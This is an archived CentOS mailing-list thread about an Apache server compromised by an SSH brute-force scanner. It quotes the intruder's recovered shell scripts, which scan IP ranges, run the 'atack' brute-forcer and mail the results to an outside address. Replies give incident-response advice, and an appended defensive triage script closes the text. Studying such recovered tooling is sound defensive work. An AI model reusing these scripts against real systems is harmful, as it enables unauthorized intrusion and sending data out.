Linux Advocate
2009-Jun-03 03:23 UTC
[CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....
Guys, apache's cpu usage is hitting 100% sometimes (to such an extent that it's very noticeable) on a box with just 8 users or so.

I'm getting this when I run 'top'. The worrying thing is seeing the word 'atack' under COMMAND:

  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM   TIME+  COMMAND
23119 apache    15   0   964  556  472 S  0.7  0.0 0:03.68 atack
23479 apache    15   0   964  556  472 S  0.7  0.0 0:01.94 atack
22170 apache    15   0   964  560  472 S  0.3  0.0 0:05.23 atack
22375 apache    15   0   964  560  472 S  0.3  0.0 0:04.21 atack
22858 apache    15   0   964  560  472 S  0.3  0.0 0:02.87 atack
22997 apache    15   0   964  560  472 S  0.3  0.0 0:04.11 atack
22999 apache    15   0   964  560  472 S  0.3  0.0 0:02.22 atack
23007 apache    15   0   964  560  472 S  0.3  0.0 0:03.79 atack
23099 apache    15   0   964  556  472 S  0.3  0.0 0:02.18 atack
23101 apache    15   0   964  556  472 S  0.3  0.0 0:02.48 atack
23108 apache    15   0   964  556  472 S  0.3  0.0 0:03.59 atack
23109 apache    15   0   964  556  472 S  0.3  0.0 0:02.75 atack
23112 apache    15   0   972  504  412 S  0.3  0.0 0:04.70 atack
23115 apache    15   0   964  556  472 S  0.3  0.0 0:03.75 atack
23116 apache    15   0   964  556  472 S  0.3  0.0 0:02.80 atack
23121 apache    15   0   972  504  412 S  0.3  0.0 0:03.79 atack
23384 apache    15   0   964  556  472 S  0.3  0.0 0:01.63 atack
23389 apache    15   0   964  556  472 S  0.3  0.0 0:03.52 atack
23392 apache    15   0   964  556  472 S  0.3  0.0 0:01.61 atack
23397 apache    15   0   964  556  472 S  0.3  0.0 0:01.62 atack
23405 apache    15   0   964  556  472 S  0.3  0.0 0:03.64 atack

When I 'ps -ef' I can see many lines as below:

apache   24253 23378  0 10:54 ?        00:00:00 ./atack 100
apache   24286 23378  0 10:59 ?        00:00:00 ./atack 100
apache   24292 23378  0 11:00 ?        00:00:01 ./atack 100
apache   24335 23378  0 11:01 ?        00:00:00 ./atack 100
apache   24344 23378  0 11:01 ?        00:00:00 ./atack 100
apache   24347 23378  0 11:02 ?        00:00:00 ./atack 100
apache   24358 23378  0 11:04 ?        00:00:00 ./atack 100

Hell, has my centos 5.3 box been hacked??? Help !!!!!!!!!!
Linux Advocate
2009-Jun-03 03:39 UTC
[CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....
Sorry, typos amended....

Guys, apache's cpu usage is hitting 100% sometimes (to such an extent that it's very noticeable) on a box (2gb ram) with just 8 users or so. This never happened before.

I'm getting this when I run 'top'. The worrying thing is seeing the word 'atack' under COMMAND:

  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM   TIME+  COMMAND
23119 apache    15   0   964  556  472 S  0.7  0.0 0:03.68 atack
23479 apache    15   0   964  556  472 S  0.7  0.0 0:01.94 atack
22170 apache    15   0   964  560  472 S  0.3  0.0 0:05.23 atack
22375 apache    15   0   964  560  472 S  0.3  0.0 0:04.21 atack
22858 apache    15   0   964  560  472 S  0.3  0.0 0:02.87 atack
22997 apache    15   0   964  560  472 S  0.3  0.0 0:04.11 atack
22999 apache    15   0   964  560  472 S  0.3  0.0 0:02.22 atack
23007 apache    15   0   964  560  472 S  0.3  0.0 0:03.79 atack
23099 apache    15   0   964  556  472 S  0.3  0.0 0:02.18 atack
23101 apache    15   0   964  556  472 S  0.3  0.0 0:02.48 atack
23108 apache    15   0   964  556  472 S  0.3  0.0 0:03.59 atack
23109 apache    15   0   964  556  472 S  0.3  0.0 0:02.75 atack
23112 apache    15   0   972  504  412 S  0.3  0.0 0:04.70 atack
23115 apache    15   0   964  556  472 S  0.3  0.0 0:03.75 atack
23116 apache    15   0   964  556  472 S  0.3  0.0 0:02.80 atack
23121 apache    15   0   972  504  412 S  0.3  0.0 0:03.79 atack
23384 apache    15   0   964  556  472 S  0.3  0.0 0:01.63 atack
23389 apache    15   0   964  556  472 S  0.3  0.0 0:03.52 atack
23392 apache    15   0   964  556  472 S  0.3  0.0 0:01.61 atack
23397 apache    15   0   964  556  472 S  0.3  0.0 0:01.62 atack
23405 apache    15   0   964  556  472 S  0.3  0.0 0:03.64 atack

When I 'ps -ef' I can see many lines as below:

apache   24253 23378  0 10:54 ?        00:00:00 ./atack 100
apache   24286 23378  0 10:59 ?        00:00:00 ./atack 100
apache   24292 23378  0 11:00 ?        00:00:01 ./atack 100
apache   24335 23378  0 11:01 ?        00:00:00 ./atack 100
apache   24344 23378  0 11:01 ?        00:00:00 ./atack 100
apache   24347 23378  0 11:02 ?        00:00:00 ./atack 100
apache   24358 23378  0 11:04 ?        00:00:00 ./atack 100

Hell, has my centos 5.3 box been hacked??? Help !!!!!!!!!!
John R. Dennison
2009-Jun-03 03:43 UTC
[CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....
On Tue, Jun 02, 2009 at 08:23:16PM -0700, Linux Advocate wrote:
> Hell, has my centos 5.3 box been hacked??? Help !!!!!!!!!!

Yes. Reinstall; fully update components; restore *data* from backups (you have backups, right?) and review what web packages you have installed and make sure those are fully updated also.

Your box is compromised. You have no way to gauge the severity, so treat it as a lost cause; nothing on it can be trusted at this point.

John

-- 
"I'm sorry but our engineers do not have phones."
As stated by a Network Solutions Customer Service representative when asked to be put through to an engineer.
"My other computer is your windows box." Ralf Hildebrandt
<sxem> trying to play sturgeon while it's under attack is apparently not fun.
William Warren
2009-Jun-03 03:48 UTC
[CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....
John R. Dennison wrote:
> On Tue, Jun 02, 2009 at 08:23:16PM -0700, Linux Advocate wrote:
>> Hell, has my centos 5.3 box been hacked??? Help !!!!!!!!!!
>
> Yes. Reinstall; fully update components; restore *data* from backups (you have backups, right?) and review what web packages you have installed and make sure those are fully updated also.
>
> Your box is compromised. You have no way to gauge the severity, so treat it as a lost cause; nothing on it can be trusted at this point.
>
> John

Some google foo shows this is a WINDOWS exploit, not a linux one.
http://www.linuxquestions.org/questions/slackware-14/analyzing-apache-logs-174552/
William Warren
2009-Jun-03 03:49 UTC
[CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....
John R. Dennison wrote:
> On Tue, Jun 02, 2009 at 08:23:16PM -0700, Linux Advocate wrote:
>> Hell, has my centos 5.3 box been hacked??? Help !!!!!!!!!!
>
> Yes. Reinstall; fully update components; restore *data* from backups (you have backups, right?) and review what web packages you have installed and make sure those are fully updated also.
>
> Your box is compromised. You have no way to gauge the severity, so treat it as a lost cause; nothing on it can be trusted at this point.
>
> John

http://www.derkeiler.com/Newsgroups/comp.os.linux.security/2004-05/0202.html
Linux Advocate
2009-Jun-03 04:01 UTC
[CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....
Reply below.

----- Original Message ----
> From: John R. Dennison <jrd at gerdesas.com>
> To: CentOS mailing list <centos at centos.org>
> Sent: Wednesday, June 3, 2009 11:43:46 AM
> Subject: Re: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....
>
> On Tue, Jun 02, 2009 at 08:23:16PM -0700, Linux Advocate wrote:
>> Hell, has my centos 5.3 box been hacked??? Help !!!!!!!!!!
>
> Yes. Reinstall; fully update components; restore *data* from backups (you have backups, right?) and review what web packages you have installed and make sure those are fully updated also.
>
> Your box is compromised. You have no way to gauge the severity, so treat it as a lost cause; nothing on it can be trusted at this point.

ohhhhhhhhhhhhhhhh .... godddddddddddddd..................... I have quite a few linux boxes and not even one has been hacked..... oh man !!!!!! really??? I have to format the box.....
Neil Aggarwal
2009-Jun-03 04:02 UTC
[CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....
Hello:

If there are processes running on your machine which you do not recognize, assume the machine has been compromised. Take it offline and wipe it immediately.

Neil

-- 
Neil Aggarwal, (832)245-7314, www.JAMMConsulting.com
Eliminate junk email and reclaim your inbox. Visit http://www.spammilter.com for details.

> -----Original Message-----
> From: centos-bounces at centos.org [mailto:centos-bounces at centos.org] On Behalf Of Linux Advocate
> Sent: Tuesday, June 02, 2009 10:23 PM
> To: CentOS mailing list
> Subject: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....
>
> Guys, apache cpus usage is hitting 100% sometimes ( to such an extent that its very noticeable) on a box with just 8 users or so.
>
> i m getting this when i run 'top'. The worrying thing is seeing the work 'atack' under command
>
>   PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM   TIME+  COMMAND
> 23119 apache    15   0   964  556  472 S  0.7  0.0 0:03.68 atack
> 23479 apache    15   0   964  556  472 S  0.7  0.0 0:01.94 atack
> [...]
>
> When i 'ps -ef' i can see many lines as below;
>
> apache   24253 23378  0 10:54 ?        00:00:00 ./atack 100
> apache   24286 23378  0 10:59 ?        00:00:00 ./atack 100
> [...]
>
> Hell, has my centos 5.3 box been hacked??? Help !!!!!!!!!!
It's possible your box is attacked, has been compromised.. or it's possible that it's also being slammed by some sort of potential attack/hack.

Regarding the apache app, what do the log files say... what apps do you have running on the apache server? Are these apps home grown, or installed from some public source?

Do the research online to see what kind of attack you might have... it might be that your box is completely safe...

You might also track/monitor any kind of attempt at the box communicating with other ip addresses that you aren't using....

Doing a complete reinstall is a draconian measure and may not be called for... your mileage might vary...

-----Original Message-----
From: centos-bounces at centos.org [mailto:centos-bounces at centos.org]On Behalf Of Linux Advocate
Sent: Tuesday, June 02, 2009 8:23 PM
To: CentOS mailing list
Subject: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....

> Guys, apache cpus usage is hitting 100% sometimes ( to such an extent that its very noticeable) on a box with just 8 users or so.
>
> i m getting this when i run 'top'. The worrying thing is seeing the work 'atack' under command
>
>   PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM   TIME+  COMMAND
> 23119 apache    15   0   964  556  472 S  0.7  0.0 0:03.68 atack
> 23479 apache    15   0   964  556  472 S  0.7  0.0 0:01.94 atack
> [...]
>
> When i 'ps -ef' i can see many lines as below;
>
> apache   24253 23378  0 10:54 ?        00:00:00 ./atack 100
> apache   24286 23378  0 10:59 ?        00:00:00 ./atack 100
> [...]
>
> Hell, has my centos 5.3 box been hacked??? Help !!!!!!!!!!
Linux Advocate
2009-Jun-03 16:33 UTC
[CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....
BRUCE U ARE A F******* GENIUS MAN !!!!! u were right bro....thanx for spending the time on this man.... more info below !!!!!!!!!!!!!

----- Original Message ----
> From: bruce <bedouglas at earthlink.net>
> To: linuxhousedn at yahoo.com
> Sent: Wednesday, June 3, 2009 9:53:24 PM
> Subject: RE: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....
>
> hi...
>
> i've seen a few of your threads on your issue of the 'atack' processes running from your web server...
>
> i'm replying to you offline, as ......
>
> take a look over your box, and let's see what you have...

As per yr tip I had found a file called atack under this folder /dev/shm/unix .... even though I could not locate such a file before..... I have now removed that file and am now probing the contents of the /dev/shm/unix folder.....

[root at fwgw unix]# pwd
/dev/shm/unix
[root at fwgw unix]# ls -al
total 4352
drwxr-xr-x 2 apache apache     360 Jun  3 23:47 .
drwxrwxrwt 3 root   root        60 Jun  3 00:24 ..
-rwxr-xr-x 1 apache apache       0 May 19 06:02 124.164.find.22
-rwxr-xr-x 1 apache apache       0 Mar 24 22:28 129.135.find.22
-rwxr-xr-x 1 apache apache       0 Mar 24 22:25 129.find.22
-rwxr-xr-x 1 apache apache       0 May 25 13:54 21.168.find.22
-rwxr-xr-x 1 apache apache   12687 May 25 06:16 60.191.find.22
-rw-r--r-- 1 apache apache       0 Jun  3 23:45 83.182.find.22
-rwxr-xr-x 1 apache apache    4631 Apr 21 17:50 84.2.find.22
-rwxr-xr-x 1 apache apache       0 May 25 06:17 89.38.find.22
-rwxr-xr-x 1 apache apache    2362 May 19 15:28 91.204.find.22
-rwxr-xr-x 1 apache apache     216 May 18  2005 auto
-rwxr-xr-x 1 apache apache 4374933 May 15 19:41 data.conf
-rwxr-xr-x 1 apache apache   15729 Oct 14  2005 find
-rw-r--r-- 1 apache apache    5262 Jun  3 23:45 log
-rwxr-xr-x 1 apache apache     751 May 25 06:33 unix
-rw-r--r-- 1 apache apache       0 Jun  3 23:04 vuln.txt
-rwxr-xr-x 1 apache apache     671 May 25 13:56 x

The contents of file 'x' are:

#!/bin/bash
echo "[+] PLM prea destept pentru voi : Yuli [+]"
X=0
c=0
while [ $X -le 255 ]
do
c=$RANDOM
let "c %= 255"
echo "[+] Scanam radom class b $1.$c [+]"
./find $1.$c 22
sleep 10
cat $1.$c.find.22 |sort |uniq > ip.conf
oopsnr2=`grep -c . ip.conf`
echo "[+] Incepe partea cea mai misto :D"
echo "[+] Doar $oopsnr2 de servere. Exista un inceput pt. toate !"
echo "[=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=]"
echo "[+] Incepem sa vedem cate server putem sparge"
./atack 100 >> log
mail -s $1.$c yuli1989xxx at yahoo.com < log
rm -rf $1.$c.find.22 ip.conf
echo "[+] Scanner a terminat de scanat !"
echo "[+] Next random class b !"
X=$((X+1))

The contents of the file 'unix' are:

#!/bin/bash
if [ $# != 1 ]; then
echo "[+] Folosim : $0 [b class]"
exit;
fi
echo "[+][+][+][+][+] UnixCoD Atack Scanner [+][+][+][+][+]"
echo "[+] SSH Brute force scanner : user & password [+]"
echo "[+] Undernet Channel : #yuli [+]"
echo "[+][+][+][+][+][+][+] ver 0x10 [+][+][+][+][+][+][+]"
./find $1 22
sleep 10
cat $1.find.22 |sort |uniq > ip.conf
oopsnr2=`grep -c . ip.conf`
echo "[+] Incepe partea cea mai misto :D"
echo "[+] Doar $oopsnr2 de servere. Exista un inceput pt. toate !"
echo "[=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=]"
echo "[+] Incepem sa vedem cate server putem sparge"
./atack 100
rm -rf $1.find.22 ip.conf
echo "[+] UnixCoD Scanner a terminat de scanat !"

The contents of 'auto' are:

#!/bin/sh
echo
echo "Enter A class range"
read brange
echo "Enter output file"
read file
crange=0
while [ $crange -lt 255 ] ; do
echo -n "./assh $brange.$crange ; " >> $file
let crange=crange+1
done

The contents of 'log' are:

[+] No SSH ->www:www:83.246.113.34
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] No SSH ->www:www:83.246.119.41
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]

Further googling indicates that UnixCoD is a brute force ssh scanner... what is odd is that I have fail2ban running (which blocks IPs after 2 failed attempts) and an 8 letter passwd but I still got hacked....

Guys...any comments....

AND ONCE AGAIN THANKS BRUCE !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Regards,
Marco.
>   PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM   TIME+  COMMAND
> 23119 apache    15   0   964  556  472 S  0.7  0.0 0:03.68 atack
> 23479 apache    15   0   964  556  472 S  0.7  0.0 0:01.94 atack
> [...]
>
> When i 'ps -ef' i can see many lines as below;
>
> apache   24253 23378  0 10:54 ?        00:00:00 ./atack 100
> apache   24286 23378  0 10:59 ?        00:00:00 ./atack 100
> [...]
>
> Hell, has my centos 5.3 box been hacked??? Help !!!!!!!!!!

A good tool to have on your linux box that may help, some.

http://rkhunter.sourceforge.net/
http://rpmfind.net/linux/rpm2html/search.php?query=rkhunter

After installing do:

rkhunter --update
rkhunter -c

And see if it finds anything.
I usually watch and listen to this mailing list but this one really caught my eye.. I used to do a lot of this in the military for 20yrs on nix boxes. Now I am a net engineer for a mid sized WISP. I have seen how brutal attacks take place on nix boxes.

When I config a nix box the first thing I do is set the firewall up to block all ports above 1048 and only let in or out what ports are needed for the machine. My favorite ports to block are ftp, ssh and telnet. I will configure different ports for those apps if they are needed. I even block these common ports on our gateway to the network and only allow certain accounts inside the net access because they do not know how to change their ports to something uncommon.

Most root kits are hard scripted for the common ports, unless the attacker is smart enough to use a port scanner to try and find alternate ports, but I can also block most scanners by dropping certain connection types. I have had a machine online for about 16yrs uptime with no attacks. They try but they die:)

If it was easy enough for a root kit to get access to your machine then there are some definite holes in the system.
Matt wrote:
>   PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM   TIME+  COMMAND
> 23119 apache    15   0   964  556  472 S  0.7  0.0 0:03.68 atack
> [...]
>
> When i 'ps -ef' i can see many lines as below;
>
> apache   24253 23378  0 10:54 ?        00:00:00 ./atack 100
> [...]
>
> Hell, has my centos 5.3 box been hacked??? Help !!!!!!!!!!
>
> I good tool to have on your linux box that may help, some.
>
> http://rkhunter.sourceforge.net/
> http://rpmfind.net/linux/rpm2html/search.php?query=rkhunter
>
> After installing do.
>
> rkhunter --update
> rkhunter -c
>
> And see if it finds anything.
Linux Advocate
2009-Jun-13 07:02 UTC
[CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....
Matt, great idea.... I FOUND SOMETHING... pls see below...

________________________________
> From: Matt <lm7812 at gmail.com>
> To: CentOS mailing list <centos at centos.org>
> Sent: Thursday, June 4, 2009 4:40:57 AM
> Subject: Re: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....
>
>   PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM   TIME+  COMMAND
> 23119 apache    15   0   964  556  472 S  0.7  0.0 0:03.68 atack
>
> When i 'ps -ef' i can see many lines as below;
>
> apache   24253 23378  0 10:54 ?        00:00:00 ./atack 100
> apache   24286 23378  0 10:59 ?        00:00:00 ./atack 100
>
> I good tool to have on your linux box that may help, some.
> http://rkhunter.sourceforge.net/
> http://rpmfind.net/linux/rpm2html/search.php?query=rkhunter
> After installing do.
> rkhunter --update
> rkhunter -c
> And see if it finds anything.

I DID FIND SOMETHING...NOT SURE WHAT THOUGH ;)

* Filesystem checks
  Checking /dev for suspicious files...                      [ OK ]
  Scanning for hidden files...                               [ Warning! ]
---------------
/etc/.pwd.lock
/usr/share/man/man1/..1.gz
/dev/.udev
---------------
Please inspect:  /usr/share/man/man1/..1.gz (gzip compressed data, from Unix, max compression)
                 /dev/.udev (directory)

The contents of the /dev/.udev folder:

drwxr-xr-x 2 root root 540 Jun  8 15:41 db
drwxr-xr-x 2 root root 740 Jun  8 15:41 failed
-rw-r--r-- 1 root root   4 Jun  8 15:42 uevent_seqnum

The contents of the ../man1/ folder:

[root at fwg man1]# ls -al :.1.gz
-rw-r--r-- 1 root root 40 Jan 22 09:14 :.1.gz
[root at fwgw man1]# ls -al [.1.gz
-rw-r--r-- 1 root root 40 Jan 22 09:14 [.1.gz

Anything out of the ordinary?

---------------------------- Scan results ----------------------------
MD5 scan
Skipped            <--- WHY SKIPPED ? bcos OS unknown as shown in the NOTE below?
File scan
Scanned files: 342
Possible infected files: 0
Application scan
Vulnerable applications: 0
Scanning took 32 seconds
....................... end .........................................

NOTE: When we run rkhunter, rkhunter says the lines below... even though I installed from the centos repo? But still it says it's an unknown OS:

Rootkit Hunter 1.2.9 is running
Determining OS... Unknown
Warning: This operating system is not fully supported!
All MD5 checks will be skipped!

Anything out of the ordinary?
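The two checks that produced the thread's findings (Bruce's tip that turned up apache-owned executables in /dev/shm/unix, and rkhunter's hidden-files warning that Marco is asking about) can be scripted so they run on a schedule instead of after the fact. The helpers below are an added example, not code from the thread or from rkhunter; they assume the web server user is "apache" as on the CentOS 5.3 box, and take the user name and directories as parameters so they can be run against a constructed tree as well as a live box.

```shell
#!/bin/sh
# Added triage helpers (example code, not from the thread or from rkhunter).
# Assumptions: the web server runs as "apache"; rpm may or may not be present.

# Print executables owned by USER below each DIR, one path per line, sorted.
# /dev/shm, /tmp and /var/tmp hold data only in normal operation, so any
# executable the web server user owns there (like /dev/shm/unix/atack above)
# is worth pulling for inspection. Exit status 1 when nothing is found.
find_webuser_executables() {
    user=$1
    shift
    hits=$(for dir in "$@"; do
               [ -d "$dir" ] && find "$dir" -xdev -type f -user "$user" -perm -100 2>/dev/null
           done | sort)
    [ -n "$hits" ] || return 1
    printf '%s\n' "$hits"
}

# List dot-named entries directly under each DIR, which is what rkhunter's
# "Scanning for hidden files" step reports (/dev/.udev, /etc/.pwd.lock).
find_hidden_entries() {
    for dir in "$@"; do
        [ -d "$dir" ] && find "$dir" -mindepth 1 -maxdepth 1 -name '.*' 2>/dev/null
    done | sort
}

# Tell package-owned paths from unknown ones via the RPM database, which is
# the quickest way to decide whether a hidden-file hit needs a closer look.
# Output: "packaged:<rpm> PATH", "unpackaged PATH", or "no-rpm PATH" when
# the rpm command is not available on this host.
classify_path() {
    path=$1
    if ! command -v rpm >/dev/null 2>&1; then
        echo "no-rpm $path"
    elif pkg=$(rpm -qf "$path" 2>/dev/null); then
        echo "packaged:$pkg $path"
    else
        echo "unpackaged $path"
    fi
}

# Run both checks over the locations from the thread and classify every hit.
triage() {
    user=${1:-apache}
    echo "== executables owned by $user in writable tmp/tmpfs locations =="
    find_webuser_executables "$user" /dev/shm /tmp /var/tmp || echo "(none)"
    echo "== hidden entries in /dev, /etc and man1 =="
    find_hidden_entries /dev /etc /usr/share/man/man1 | while read -r p; do
        classify_path "$p"
    done
}

# Only touch the live system when invoked explicitly: ./triage.sh --run [user]
if [ "${1:-}" = "--run" ]; then
    triage "${2:-apache}"
fi
```

Anything reported as "unpackaged" under /dev/shm, /tmp or /var/tmp and owned by the web server user should be preserved (copied off with ownership and timestamps intact) before it is removed, since the file listing and timestamps are the only record of when the box was first touched.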